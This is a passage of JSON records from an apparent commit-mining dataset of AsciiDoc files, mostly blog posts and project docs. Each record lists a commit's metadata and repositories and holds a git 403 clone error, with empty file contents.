#430\n","repos":"yonglehou\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f84677b7f0a554937491f6d776e1683f726657b7","subject":"Initial proposal on users","message":"Initial proposal on users\n","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/design\/user-resource.adoc","new_file":"documentation\/design_docs\/design\/user-resource.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b755152595119b245bf48b072b0e6eefe0b0492e","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44db253be2ff15b14881b0a12e856a0f852905f2","subject":"Update 2019-01-31-Java-Quiz.adoc","message":"Update 2019-01-31-Java-Quiz.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2019-01-31-Java-Quiz.adoc","new_file":"_posts\/2019-01-31-Java-Quiz.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6288614e203801357cff58f8e96afc4b1ab1f4ba","subject":"Update 2016-05-17-Budapest-JS-2016.adoc","message":"Update 2016-05-17-Budapest-JS-2016.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-05-17-Budapest-JS-2016.adoc","new_file":"_posts\/2016-05-17-Budapest-JS-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"527b6cff17c518b8e1c862b7fe2f0255e5165b6c","subject":"Update 2016-06-18-Non-secure-icons.adoc","message":"Update 2016-06-18-Non-secure-icons.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a45766ee5f3470710ce721e21d96b1438f07a05","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07f373a987fb65b004122ddddc3d4fb3cd8eb5d0","subject":"Update 2019-05-15-Where-is-Prateek.adoc","message":"Update 
2019-05-15-Where-is-Prateek.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2019-05-15-Where-is-Prateek.adoc","new_file":"_posts\/2019-05-15-Where-is-Prateek.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"daf73bb2d9f0fbc4015271ca5b11b9a81bc07ff5","subject":"Update 2016-01-18-Queries-in-Google-Sheets.adoc","message":"Update 2016-01-18-Queries-in-Google-Sheets.adoc","repos":"danen-carlson\/blog,danen-carlson\/blog,danen-carlson\/blog","old_file":"_posts\/2016-01-18-Queries-in-Google-Sheets.adoc","new_file":"_posts\/2016-01-18-Queries-in-Google-Sheets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danen-carlson\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78fd63d92e15ee450029b325e45a153cff55ad46","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c90f101e9afd8eba685053288104dd42a2ca7cc","subject":"Fixed typo","message":"Fixed typo\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc24d00fdeadec2bcd3348a4b42576081cbccf82","subject":"Fixes #1211","message":"Fixes 
#1211\n","repos":"sfat\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,sfat\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,sfat\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfat\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aad2f8234eba46636cacdc76d7f5f1f74dc4c3be","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97427e4c22410c6a1397c233c88545e2d2526476","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a86e30c6145555736a67f4ede7c13d19a2e3a9be","subject":"Update 2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","message":"Update 2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","repos":"laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io","old_file":"_posts\/2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","new_file":"_posts\/2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/laposheureux\/laposheureux.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbe80ea81b319616df4054094afe990a6f32c5ba","subject":"[docs] Add missing krb deps to the SLES12 and Ubuntu instructions","message":"[docs] Add missing krb deps to the SLES12 and Ubuntu instructions\n\nChange-Id: I9f98443a923edb6687427a5863e969883266bd30\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5130\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e78d345f3be65a0d8a5911b295b5cca88946d7ce","subject":"add errata asciidoc file","message":"add errata asciidoc file\n","repos":"psaris\/funq,psaris\/funq","old_file":"errata.adoc","new_file":"errata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psaris\/funq.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ed3f333d3d7d21af0030255a99961bc1818ab8b","subject":"y2b create post You've Never Seen A Mouse Do This...","message":"y2b create post You've Never Seen A Mouse Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-13-YouveNeverSeenAMouseDoThis.adoc","new_file":"_posts\/2017-12-13-YouveNeverSeenAMouseDoThis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdd5c03b0a39d8f21ec0cc2fde32e44ab56c026d","subject":"Additin to NOTES","message":"Additin to NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9941d151373d6895aded0df1cc8396fc82ce0269","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/visual-tools-jul.adoc","new_file":"content\/events\/2022\/visual-tools-jul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The 
requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5a82fe162970e0aec6c736a1496b0b6f1ab16f05","subject":"Update 2015-11-05-improve-java-dev-environment-with-docker.adoc","message":"Update 2015-11-05-improve-java-dev-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-11-05-improve-java-dev-environment-with-docker.adoc","new_file":"_posts\/2015-11-05-improve-java-dev-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2af8a14c5c66cbbc6976a4b529c6dd38bf79151d","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e661d9a1d81f5237683316f4daa214f59674b730","subject":"includes starter documentation","message":"includes starter documentation\n","repos":"bd2kccd\/ccd-annotations","old_file":"src\/main\/docs\/api-guide.adoc","new_file":"src\/main\/docs\/api-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bd2kccd\/ccd-annotations.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"eb1d14943efb0df930e8ec1424bfb3234b55532b","subject":"create post The Most RIDICULOUS MacBook Pro","message":"create post The Most RIDICULOUS MacBook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Most-RIDICULOUS-MacBook-Pro.adoc","new_file":"_posts\/2018-02-26-The-Most-RIDICULOUS-MacBook-Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c88f2b41bf59775495c581f3d0f24b79f80741ba","subject":"Added remove headers EIP docs","message":"Added remove headers EIP 
docs\n","repos":"curso007\/camel,gnodet\/camel,CodeSmell\/camel,objectiser\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,tadayosi\/camel,snurmine\/camel,snurmine\/camel,onders86\/camel,anoordover\/camel,pax95\/camel,snurmine\/camel,tadayosi\/camel,mcollovati\/camel,CodeSmell\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,alvinkwekel\/camel,ullgren\/camel,gautric\/camel,tdiesler\/camel,akhettar\/camel,nikhilvibhav\/camel,anoordover\/camel,adessaigne\/camel,anoordover\/camel,sverkera\/camel,dmvolod\/camel,curso007\/camel,ullgren\/camel,jonmcewen\/camel,mcollovati\/camel,mcollovati\/camel,apache\/camel,christophd\/camel,ullgren\/camel,adessaigne\/camel,punkhorn\/camel-upstream,pax95\/camel,adessaigne\/camel,dmvolod\/camel,adessaigne\/camel,nikhilvibhav\/camel,cunningt\/camel,jonmcewen\/camel,CodeSmell\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,snurmine\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,kevinearls\/camel,gnodet\/camel,kevinearls\/camel,gautric\/camel,pax95\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,cunningt\/camel,pmoerenhout\/camel,jamesnetherton\/camel,gnodet\/camel,sverkera\/camel,davidkarlsen\/camel,davidkarlsen\/camel,Fabryprog\/camel,zregvart\/camel,DariusX\/camel,kevinearls\/camel,pax95\/camel,jamesnetherton\/camel,gnodet\/camel,akhettar\/camel,tadayosi\/camel,jonmcewen\/camel,jonmcewen\/camel,christophd\/camel,curso007\/camel,pmoerenhout\/camel,christophd\/camel,onders86\/camel,jamesnetherton\/camel,gautric\/camel,Fabryprog\/camel,mcollovati\/camel,kevinearls\/camel,tdiesler\/camel,nicolaferraro\/camel,jamesnetherton\/camel,curso007\/camel,jamesnetherton\/camel,pax95\/camel,apache\/camel,davidkarlsen\/camel,sverkera\/camel,DariusX\/camel,apache\/camel,onders86\/camel,zregvart\/camel,anoordover\/camel,onders86\/camel,gautric\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,objectiser\/camel,nicolaferraro\/camel,sverkera\/camel,zregvart\/camel,objectiser\/camel,tdiesler\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,cunningt\/camel,jamesnetherton\/camel,sverkera\/camel,adessaigne\/camel,akhettar\/camel,DariusX\/camel,tadayosi\/camel,curso007\/camel,sverkera\/camel,snurmine\/camel,pax95\/camel,dmvolod\/camel,zregvart\/camel,curso007\/camel,Fabryprog\/camel,objectiser\/camel,akhettar\/camel,anoordover\/camel,dmvolod\/camel,alvinkwekel\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,akhettar\/camel,onders86\/camel,Fabryprog\/camel,DariusX\/camel,dmvolod\/camel,jonmcewen\/camel,gautric\/camel,akhettar\/camel,ullgren\/camel,apache\/camel,gautric\/camel,pmoerenhout\/camel,snurmine\/camel,pmoerenhout\/camel,anoordover\/camel,dmvolod\/camel,tdiesler\/camel,onders86\/camel,kevinearls\/camel,kevinearls\/camel,cunningt\/camel,pmoerenhout\/camel,jonmcewen\/camel,nicolaferraro\/camel,gnodet\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/removeHeaders-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/removeHeaders-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b3a9d291da5433dda337222e7b483602d1a278b3","subject":"Update 2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","message":"Update 
2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","repos":"hotfloppy\/hotfloppy.github.io,hotfloppy\/hotfloppy.github.io,hotfloppy\/hotfloppy.github.io","old_file":"_posts\/2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","new_file":"_posts\/2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hotfloppy\/hotfloppy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0202e813349cad547dd2fb32a9eb8b334ca8f86","subject":"y2b create post Apple Pencil Drawing Challenge!","message":"y2b create post Apple Pencil Drawing Challenge!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-26-Apple-Pencil-Drawing-Challenge.adoc","new_file":"_posts\/2015-11-26-Apple-Pencil-Drawing-Challenge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f47df28e5a6b7573a579442e2539c28062340a53","subject":"Remained one awesome bug bad URI","message":"Remained one awesome bug bad URI\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Class path\/Exercices.adoc","new_file":"Class path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2f5daa5dfbd42dd8cb636c53df79fa337f25cf5","subject":"Added exchangeProperty language to Gitbook","message":"Added exchangeProperty language to 
Gitbook\n","repos":"ullgren\/camel,DariusX\/camel,w4tson\/camel,prashant2402\/camel,jonmcewen\/camel,JYBESSON\/camel,yuruki\/camel,tdiesler\/camel,christophd\/camel,tkopczynski\/camel,sabre1041\/camel,sverkera\/camel,sirlatrom\/camel,w4tson\/camel,ullgren\/camel,dmvolod\/camel,curso007\/camel,prashant2402\/camel,allancth\/camel,jkorab\/camel,gautric\/camel,isavin\/camel,snurmine\/camel,sabre1041\/camel,onders86\/camel,sabre1041\/camel,davidkarlsen\/camel,apache\/camel,bhaveshdt\/camel,drsquidop\/camel,ullgren\/camel,christophd\/camel,adessaigne\/camel,Thopap\/camel,scranton\/camel,tlehoux\/camel,objectiser\/camel,kevinearls\/camel,curso007\/camel,gilfernandes\/camel,gautric\/camel,veithen\/camel,allancth\/camel,neoramon\/camel,gnodet\/camel,jamesnetherton\/camel,rmarting\/camel,sabre1041\/camel,prashant2402\/camel,akhettar\/camel,ssharma\/camel,anoordover\/camel,Thopap\/camel,gilfernandes\/camel,JYBESSON\/camel,hqstevenson\/camel,lburgazzoli\/apache-camel,neoramon\/camel,sverkera\/camel,pax95\/camel,jonmcewen\/camel,allancth\/camel,christophd\/camel,JYBESSON\/camel,pax95\/camel,NickCis\/camel,acartapanis\/camel,jkorab\/camel,pkletsko\/camel,nboukhed\/camel,anoordover\/camel,anoordover\/camel,pax95\/camel,sirlatrom\/camel,anoordover\/camel,curso007\/camel,davidkarlsen\/camel,jonmcewen\/camel,DariusX\/camel,prashant2402\/camel,adessaigne\/camel,akhettar\/camel,bhaveshdt\/camel,chirino\/camel,jarst\/camel,mgyongyosi\/camel,RohanHart\/camel,anton-k11\/camel,drsquidop\/camel,bhaveshdt\/camel,kevinearls\/camel,nboukhed\/camel,tadayosi\/camel,akhettar\/camel,gautric\/camel,cunningt\/camel,Fabryprog\/camel,JYBESSON\/camel,tkopczynski\/camel,bgaudaen\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,prashant2402\/camel,adessaigne\/camel,kevinearls\/camel,tkopczynski\/camel,yuruki\/camel,bgaudaen\/camel,neoramon\/camel,nboukhed\/camel,tkopczynski\/camel,lburgazzoli\/camel,onders86\/camel,veithen\/camel,mcollovati\/camel,Thopap\/camel,jarst\/camel,akhettar\/camel,hqstevenson\/camel,scranton\/camel,jarst\/camel,driseley\/camel,NickCis\/camel,JYBESSON\/camel,cunningt\/camel,tlehoux\/camel,objectiser\/camel,Fabryprog\/camel,curso007\/camel,sirlatrom\/camel,bgaudaen\/camel,ssharma\/camel,gautric\/camel,hqstevenson\/camel,veithen\/camel,adessaigne\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,pmoerenhout\/camel,hqstevenson\/camel,anton-k11\/camel,Fabryprog\/camel,akhettar\/camel,NickCis\/camel,ssharma\/camel,dmvolod\/camel,zregvart\/camel,objectiser\/camel,dmvolod\/camel,jamesnetherton\/camel,driseley\/camel,apache\/camel,drsquidop\/camel,onders86\/camel,anton-k11\/camel,veithen\/camel,w4tson\/camel,CodeSmell\/camel,gnodet\/camel,RohanHart\/camel,gnodet\/camel,prashant2402\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,isavin\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,pax95\/camel,Thopap\/camel,gilfernandes\/camel,jonmcewen\/camel,sverkera\/camel,rmarting\/camel,tlehoux\/camel,mcollovati\/camel,adessaigne\/camel,veithen\/camel,anoordover\/camel,onders86\/camel,mcollovati\/camel,pmoerenhout\/camel,sirlatrom\/camel,gilfernandes\/camel,cunningt\/camel,jkorab\/camel,christophd\/camel,sverkera\/camel,JYBESSON\/camel,pax95\/camel,rmarting\/camel,mgyongyosi\/camel,NickCis\/camel,gnodet\/camel,apache\/camel,gnodet\/camel,nboukhed\/camel,lburgazzoli\/apache-camel,anton-k11\/camel,chirino\/camel,allancth\/camel,tkopczynski\/camel,anton-k11\/camel,drsquidop\/camel,tdiesler\/camel,cunningt\/camel,DariusX\/camel,lburgazzoli\/camel,allancth\/camel,dmvolod\/camel,NickCis\/camel,al
lancth\/camel,lburgazzoli\/camel,jonmcewen\/camel,ssharma\/camel,onders86\/camel,tdiesler\/camel,objectiser\/camel,chirino\/camel,hqstevenson\/camel,nicolaferraro\/camel,ssharma\/camel,gilfernandes\/camel,chirino\/camel,RohanHart\/camel,pkletsko\/camel,salikjan\/camel,CodeSmell\/camel,jarst\/camel,isavin\/camel,isavin\/camel,chirino\/camel,sabre1041\/camel,isavin\/camel,zregvart\/camel,salikjan\/camel,mgyongyosi\/camel,snurmine\/camel,neoramon\/camel,jonmcewen\/camel,tkopczynski\/camel,alvinkwekel\/camel,gautric\/camel,acartapanis\/camel,lburgazzoli\/camel,tadayosi\/camel,sabre1041\/camel,snurmine\/camel,lburgazzoli\/apache-camel,scranton\/camel,w4tson\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,adessaigne\/camel,jamesnetherton\/camel,nicolaferraro\/camel,sverkera\/camel,christophd\/camel,pkletsko\/camel,curso007\/camel,pkletsko\/camel,cunningt\/camel,CodeSmell\/camel,kevinearls\/camel,alvinkwekel\/camel,yuruki\/camel,tlehoux\/camel,sverkera\/camel,alvinkwekel\/camel,mgyongyosi\/camel,scranton\/camel,tadayosi\/camel,isavin\/camel,davidkarlsen\/camel,Thopap\/camel,christophd\/camel,RohanHart\/camel,drsquidop\/camel,ullgren\/camel,lburgazzoli\/apache-camel,acartapanis\/camel,gautric\/camel,bgaudaen\/camel,RohanHart\/camel,nboukhed\/camel,driseley\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,jarst\/camel,bhaveshdt\/camel,nicolaferraro\/camel,mgyongyosi\/camel,snurmine\/camel,snurmine\/camel,jkorab\/camel,nboukhed\/camel,apache\/camel,pmoerenhout\/camel,sirlatrom\/camel,lburgazzoli\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,tlehoux\/camel,neoramon\/camel,bgaudaen\/camel,tdiesler\/camel,CodeSmell\/camel,ssharma\/camel,acartapanis\/camel,kevinearls\/camel,apache\/camel,onders86\/camel,DariusX\/camel,driseley\/camel,Fabryprog\/camel,jkorab\/camel,yuruki\/camel,tdiesler\/camel,snurmine\/camel,tadayosi\/camel,jamesnetherton\/camel,NickCis\/camel,driseley\/camel,tadayosi\/camel,drsquidop\/camel,gilfernandes\/camel,acartapanis\/camel,jkorab\/camel,yuruki\/camel,neoramon\/camel,hqstevenson\/camel,zregvart\/camel,dmvolod\/camel,Thopap\/camel,mcollovati\/camel,driseley\/camel,w4tson\/camel,zregvart\/camel,akhettar\/camel,dmvolod\/ca